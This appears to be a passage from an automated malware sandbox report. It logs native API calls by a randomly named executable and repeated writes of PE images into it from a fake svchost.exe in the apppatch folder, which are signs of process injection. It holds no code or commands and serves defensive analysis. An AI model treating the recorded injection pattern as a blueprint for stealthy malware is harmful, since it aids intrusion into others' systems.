Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtOpenSection: Direct from: 0x77542E0C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtQuerySystemInformation: Direct from: 0x775448CC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtSetInformationThread: Direct from: 0x775363F9
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtSetInformationThread: Direct from: 0x77542B4C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtQueryAttributesFile: Direct from: 0x77542E6C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtQueryInformationProcess: Direct from: 0x77542C26
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtQuerySystemInformation: Direct from: 0x1C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtQuerySystemInformation: Direct from: 0x77542DFC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtResumeThread: Direct from: 0x775436AC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtUnmapViewOfSection: Direct from: 0x77542D3C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtNotifyChangeKey: Direct from: 0x77543C2C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtCreateMutant: Direct from: 0x775435CC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtMapViewOfSection: Direct from: 0x77542D1C
Source: C:\Windows\apppatch\svchost.exe Memory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 632000 value starts with: 4D5A
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F32000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2B72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2482000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 532000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F42000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: F32000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2ED2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2982000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 630000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 631000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 632000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 685000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1470000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1471000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1472000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 14C5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2C35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A80000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A81000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2AD5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A45000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2170000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2171000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2172000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21C5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: D90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: D91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: D92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: DE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2145000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2125000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3040000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3041000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3042000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3095000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D80000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D81000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: CE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2560000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2561000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2562000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FF5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2620000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2621000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2622000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2675000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 11E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 11E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 11E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1235000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3130000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3131000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3132000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3185000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2EC0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2EC1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2EC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F15000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2C45000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2E25000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A2000Jump to behavior
